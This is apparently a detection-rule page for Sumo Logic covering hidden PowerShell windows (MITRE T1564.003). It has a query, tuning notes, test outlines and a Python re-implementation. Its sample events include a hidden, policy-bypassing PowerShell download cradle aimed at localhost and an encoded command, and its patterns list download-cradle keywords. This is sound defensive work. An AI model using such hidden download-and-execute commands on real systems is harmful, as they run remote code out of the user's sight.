Detect Hidden Window in Sumo Logic CSE
Adversaries may use hidden windows to conceal malicious activity from users. On Windows this can be done with PowerShell's -WindowStyle Hidden switch, by calling the ShowWindow API with SW_HIDE, or at process creation time by setting STARTF_USESHOWWINDOW and wShowWindow = SW_HIDE in the STARTUPINFO structure passed to CreateProcess, so the child never draws a visible window. On macOS, the LSUIElement or LSBackgroundOnly Info.plist keys make an application background-only with no Dock icon or menu bar. Malware families using hidden windows include Astaroth, QuietSieve, StrongPity, and LockBit 2.0.
MITRE ATT&CK
- Tactic: Defense Evasion
- Technique: T1564 Hide Artifacts
- Sub-technique: T1564.003 Hidden Window
- Canonical reference: https://attack.mitre.org/techniques/T1564/003/
Sumo Detection Query
_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*endpoint*
| where _raw matches /EventCode=1\b|EventID=4688\b/
| parse regex field=_raw "\b(?:CommandLine|ProcessCommandLine)\s*=\s*\"(?<command_line>[^\"]+)\"" nodrop
| parse regex field=_raw "\b(?:Image|NewProcessName)\s*=\s*\"(?<process_image>[^\"]+)\"" nodrop
| parse regex field=_raw "\b(?:ParentImage|ParentProcessName)\s*=\s*\"(?<parent_image>[^\"]+)\"" nodrop
| parse regex field=_raw "\b(?:User|SubjectUserName)\s*=\s*\"(?<username>[^\"]+)\"" nodrop
| parse regex field=_raw "\bComputer(?:Name)?\s*=\s*\"(?<hostname>[^\"]+)\"" nodrop
| where process_image matches /(?i)(powershell|pwsh|cmd|wscript|cscript)\.exe$/
| if(command_line matches /(?i)(?<![\w-])-(?:w|wi|win|wind|windo|window|windows|windowst|windowsty|windowstyl|windowstyle)\s+(?:h|hi|hid|hidd|hidde|hidden)\b/, 1, 0) as ps_hidden
| if(command_line matches /(?i)(?<![\w-])-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)\b/, 1, 0) as encoded_cmd
| if(command_line matches /(?i)Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadFile|Invoke-Expression|\biex\b/, 1, 0) as download_cradle
| if(command_line matches /(?i)(?<![\w-])-(?:ep|ex|exe|exec|execu|execut|executi|executio|execution|executionp|executionpo|executionpol|executionpoli|executionpolic|executionpolicy)\s+bypass\b/, 1, 0) as policy_bypass
| where ps_hidden = 1
| ps_hidden + encoded_cmd + download_cradle + policy_bypass as risk_score
| fields _time, hostname, username, process_image, command_line, parent_image, ps_hidden, encoded_cmd, download_cradle, policy_bypass, risk_score
| sort by _time desc
Detects the PowerShell hidden-window switch in the command line of powershell.exe and pwsh.exe, and of cmd.exe, wscript.exe and cscript.exe launches that wrap a PowerShell invocation (for example cmd.exe /c powershell -w h ...). Because powershell.exe accepts any unambiguous prefix of a parameter name, the regexes enumerate every prefix (-w h, -win hid, -enc, -ex bypass) rather than only the spelled-out forms; the lookbehind keeps a dash glued to a preceding token (New-Object) from counting as a switch. The composite risk_score adds one point each for an encoded command, a download cradle and an execution policy bypass co-occurring with the hidden window, so a bare -WindowStyle Hidden scores 1 and a hidden, encoded download cradle with bypass scores 4. The \b after EventCode=1 keeps Sysmon Event IDs 10 to 19 out of the result set, and the \b before each field name stops CommandLine from matching inside ParentCommandLine and Image inside ParentImage. Conditional fields use Sumo's if(...) as field form; there is no eval operator in the Sumo search language.
Data Sources
- Windows Security event log, Event ID 4688 (process creation), with the "Include command line in process creation events" audit policy enabled; without it the command line field is empty and nothing matches.
- Sysmon Event ID 1 (process creation), which carries CommandLine, ParentImage and User.
- PowerShell ScriptBlock logging (Event ID 4104) is not queried but corroborates a hit by showing the decoded script content.
Required Tables
- Sumo Logic source categories matching *windows*, *sysmon* or *endpoint*, ingested so that event fields appear in _raw as key="value" pairs; the parse regex lines assume that form and will yield empty fields for JSON or XML-rendered events.
False Positives & Tuning
- Scheduled tasks running PowerShell maintenance scripts silently (e.g., disk cleanup, Windows Defender updates, certificate renewal)
- Software deployment systems (PDQ Deploy, Chocolatey, Ninite) using hidden PowerShell to install applications without desktop prompts
- Monitoring agents or backup clients invoking hidden PowerShell for health checks or snapshot operations
All three produce a risk_score of 1 (hidden window only) under a well-known parent_image such as svchost.exe or the deployment agent, usually with -File pointing at a fixed script path. Alert on risk_score >= 2 immediately, and for score-1 hits baseline the parent_image and script path per host group and suppress the known pairs rather than the whole hidden-window pattern.
Testing Methodology
Validate this detection with the three Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: PowerShell Hidden Window Execution
Expected signal: Sysmon Event ID 1: powershell.exe with -WindowStyle Hidden in command line. Sysmon Event ID 11: file created at Temp path. PowerShell ScriptBlock Log Event ID 4104 with the command content.
- Test 2: Hidden Window with Encoded Command
Expected signal: Sysmon Event ID 1: powershell.exe with both -WindowStyle Hidden and -EncodedCommand in command line. PowerShell ScriptBlock Log Event ID 4104 showing decoded content 'whoami'.
- Test 3: Hidden Window with Execution Policy Bypass and Download Cradle
Expected signal: Sysmon Event ID 1: powershell.exe with all three flags. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. The download will fail (no server) but both process creation and network events fire.
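As an added example (not part of this page and not Sumo Logic's or Atomic Red Team's code), the query's parse, flag and score logic re-implemented in Python and run over constructed Sysmon-style lines shaped like the three tests above, a cmd.exe-wrapped launch, and the scheduled-task false positive from the tuning section. The host name, user names, paths and command lines are made up and are not the Atomic tests' real commands. It goes slightly beyond the query by generating the hidden-window and encoded-command regexes from every parameter prefix powershell.exe accepts, and by decoding the -EncodedCommand payload the way ScriptBlock logging would show it.

```python
import base64
import re

# Added example (not the page's or Sumo Logic's code): the query's parsing, flags and
# risk score re-implemented in Python so the logic can be exercised offline. Event
# shapes, host/user names and every command line below are constructed to resemble
# Sysmon Event ID 1 key="value" output; they are not real telemetry or Atomic tests.


def prefixes(word, min_len=1):
    """Alternation of every prefix of word, longest first. powershell.exe accepts any
    unambiguous prefix of a parameter name, so -w h, -win hid and -WindowStyle Hidden
    are the same switch and a detection has to match all of them."""
    return "(?:" + "|".join(word[:i] for i in range(len(word), min_len - 1, -1)) + ")"


# \b keeps CommandLine from matching inside ParentCommandLine, Image inside ParentImage
# and User inside TargetUserName.
FIELD_PATTERNS = {
    "command_line": re.compile(r'\b(?:CommandLine|ProcessCommandLine)\s*=\s*"(?P<v>[^"]+)"'),
    "process_image": re.compile(r'\b(?:Image|NewProcessName)\s*=\s*"(?P<v>[^"]+)"'),
    "parent_image": re.compile(r'\b(?:ParentImage|ParentProcessName)\s*=\s*"(?P<v>[^"]+)"'),
    "username": re.compile(r'\b(?:User|SubjectUserName)\s*=\s*"(?P<v>[^"]+)"'),
    "hostname": re.compile(r'\bComputer(?:Name)?\s*=\s*"(?P<v>[^"]+)"'),
}
# Process creation only; the trailing \b stops EventCode=1 from also matching Sysmon 10-19.
PROCESS_CREATE = re.compile(r"\bEventCode=1\b|\bEventID=4688\b")
SCRIPT_HOSTS = re.compile(r"(?:powershell|pwsh|cmd|wscript|cscript)\.exe$", re.I)
SWITCH = r"(?<![\w-])-"  # a switch dash not glued to a preceding token (New-Object)
PS_HIDDEN = re.compile(SWITCH + prefixes("windowstyle") + r"\s+" + prefixes("hidden") + r"\b", re.I)
ENCODED_RE = SWITCH + "(?:ec|" + prefixes("encodedcommand") + r")\b"
ENCODED = re.compile(ENCODED_RE, re.I)
ENCODED_ARG = re.compile(ENCODED_RE + r"\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadFile|Invoke-Expression|\biex\b", re.I)
POLICY_BYPASS = re.compile(SWITCH + "(?:ep|" + prefixes("executionpolicy", 2) + r")\s+bypass\b", re.I)

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def sysmon_event(cmd, image=PS_EXE, parent=r"C:\Windows\System32\cmd.exe", user=r"WS-0142\alice"):
    """Constructed Sysmon Event ID 1 style line in the key="value" form the query parses."""
    return (f'EventCode=1 Image="{image}" CommandLine="{cmd}" ParentImage="{parent}" '
            f'User="{user}" Computer="WS-0142"')


SAMPLE_EVENTS = {
    "test1_hidden": sysmon_event(r"powershell.exe -WindowStyle Hidden -Command Set-Content $env:TEMP\atomic.txt 1"),
    "test2_encoded": sysmon_event("powershell.exe -w h -enc dwBoAG8AYQBtAGkA"),  # UTF-16LE 'whoami'
    "test3_cradle": sysmon_event("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile "
                                 "-Command IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/a')"),
    # cmd.exe is in the host list so a wrapped, abbreviated launch still fires on the parent line
    "wrapped_in_cmd": sysmon_event("cmd.exe /c powershell -NoP -win hid -c whoami", image=r"C:\Windows\System32\cmd.exe"),
    # the scheduled-task shape from the tuning section: hidden window and nothing else
    "scheduled_task": sysmon_event(r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\ProgramData\Deploy\cleanup.ps1",
                                   parent=r"C:\Windows\System32\svchost.exe", user=r"NT AUTHORITY\SYSTEM"),
    # a file-create event must not be mistaken for process creation
    "sysmon_11": f'EventCode=11 Image="{PS_EXE}" TargetFilename="C:\\Users\\alice\\AppData\\Local\\Temp\\atomic.txt"',
}


def decode_encoded_command(cmd):
    """Recover what ScriptBlock logging (4104) would show for an -EncodedCommand payload."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(raw):
    """Mirror of the query: a process-creation event from a scripting host whose command
    line carries a hidden-window switch, with the four flags and their sum; else None."""
    if not PROCESS_CREATE.search(raw):
        return None
    ev = {}
    for name, pattern in FIELD_PATTERNS.items():
        m = pattern.search(raw)
        ev[name] = m.group("v") if m else None
    cmd, image = ev["command_line"], ev["process_image"]
    if not cmd or not image or not SCRIPT_HOSTS.search(image) or not PS_HIDDEN.search(cmd):
        return None
    ev["ps_hidden"] = 1
    ev["encoded_cmd"] = int(bool(ENCODED.search(cmd)))
    ev["download_cradle"] = int(bool(CRADLE.search(cmd)))
    ev["policy_bypass"] = int(bool(POLICY_BYPASS.search(cmd)))
    ev["risk_score"] = ev["ps_hidden"] + ev["encoded_cmd"] + ev["download_cradle"] + ev["policy_bypass"]
    ev["decoded_command"] = decode_encoded_command(cmd)
    return ev


def triage(events, min_score=2):
    """Tuning knob for the false positives listed above: a bare hidden window (score 1) is
    what silent scheduled tasks and deployment tools look like, so alert at min_score and
    send score-1 hits to a parent_image / script-path allowlist review instead."""
    hits = {name: score_event(raw) for name, raw in events.items()}
    return {name: ev for name, ev in hits.items() if ev and ev["risk_score"] >= min_score}


if __name__ == "__main__":
    for name, raw in SAMPLE_EVENTS.items():
        ev = score_event(raw)
        print(name, "no match" if ev is None else f"risk={ev['risk_score']} decoded={ev['decoded_command']!r}")
    print("alert on:", sorted(triage(SAMPLE_EVENTS)))
```

The three test shapes score 1, 2 and 3 respectively, the cmd.exe-wrapped launch and the scheduled task both score 1, and the Event ID 11 line is rejected before any field is parsed; with the default threshold only the encoded and cradle cases reach triage(), which is the split the tuning section recommends.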